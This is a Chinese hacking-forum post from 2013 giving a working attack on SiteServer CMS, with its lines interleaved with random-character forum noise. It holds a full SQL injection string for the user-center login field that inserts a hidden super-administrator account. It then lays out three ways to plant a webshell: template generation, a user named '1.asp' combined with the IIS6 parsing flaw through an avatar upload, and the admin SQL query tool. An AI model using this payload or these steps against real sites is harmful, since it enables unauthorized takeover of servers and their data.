经测试秒杀最新的3.5版) N2 n# k8 n5 h! E4 ]8 {
# ~2 M- l, \7 g' N! T& ^
stieserver官网:www.siteserver.cn
: ]0 x9 ]* g. k. K; r" _% a
5 v2 |% B X8 y1 N/ ]* X . y; k6 N! Z$ r9 D8 B+ p9 [
?& W# u9 y% A2 ?EXP:6 G! `9 r( A( X
. W1 E7 g2 {) D% G
直接访问UserCenter/login.aspx5 X7 J$ O8 N. @9 r( y& s9 s J6 \
3 p% \1 r/ `1 E5 w5 }8 D* S3 |: M
1 S8 B8 i4 |9 K$ n8 B$ C0 ?7 m/ T$ W" k+ T: s4 p
用户名处输入:0 s4 z% ], s! i2 @/ _8 @3 M
T8 J7 {0 k' A9 V- _* D123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--; s% k( i& p8 w! X
% \) o( _: F7 B& b
3 Q, c" [' M( J( \. I
6 u5 ]0 p5 Z0 W! _9 |4 H4 ]密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。% H J; g; n$ e
' H5 _( N$ c" \ ?* s
3 [, S0 }* g0 K ]0 X8 Q
( M* c5 E5 e7 f/ Z4 p1 Z- W
之后再访问后台SiteServer/login.aspx用插入的用户登陆! s, e0 ~" u& o* H8 W, D
% `: k4 c. H) B% I S. T
& U0 }1 O# x' G3 p8 r' k
" A3 G8 X2 a$ H5 W4 ~) a a后台拿webshell的三种方法:# S# x3 _3 ]/ C4 R
, Y# I. l: [ o一、1 x/ I/ X7 g/ b
0 o8 M. H2 a6 E0 \
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
9 I4 B+ [* K$ q* S r) c, t0 R* M& v: J8 T0 Q
二、6 _& ~9 ~+ p0 s9 R, Z' ~
$ }2 F" Q% s' D* K成员权限-》添加用户-》用户名为:1.asp( y8 p( K# y5 Y5 u
: k8 F% B3 \6 M8 D; R
http://127.0.0.1/usercenter/
7 j5 P* T0 p0 x U; }
+ P& ^" J" A1 r/ i: C用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell: ~/ l6 i3 l4 u# v
* M, o& z# z% @, c
(ps:后台添加用户时不会验证是否含有非法字符)
; `" @" r* `( z( Y, q* m' X& L. ]- V( l
三、 p7 w' y+ D3 `4 D {% A
) r) i) l0 b8 a+ L( [) P; F; d: }! Z) L系统工具-》实用工具-》机器参数查看, B7 H3 }4 {4 c; P! p! [
可以看到数据库类型、名称,WEB路径4 m! ?5 d8 L2 e/ V: j
$ O/ M ~7 U; o4 o系统工具-》数据库工具-》SQL语句查询
9 ~' U/ \) z# }7 J, [) L这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
6 N" I% G2 `' n+ r( b; |+ M2 A3 P' i {: J. T. r
|
发表于 2013-1-11 21:10:58
收藏
支持
反对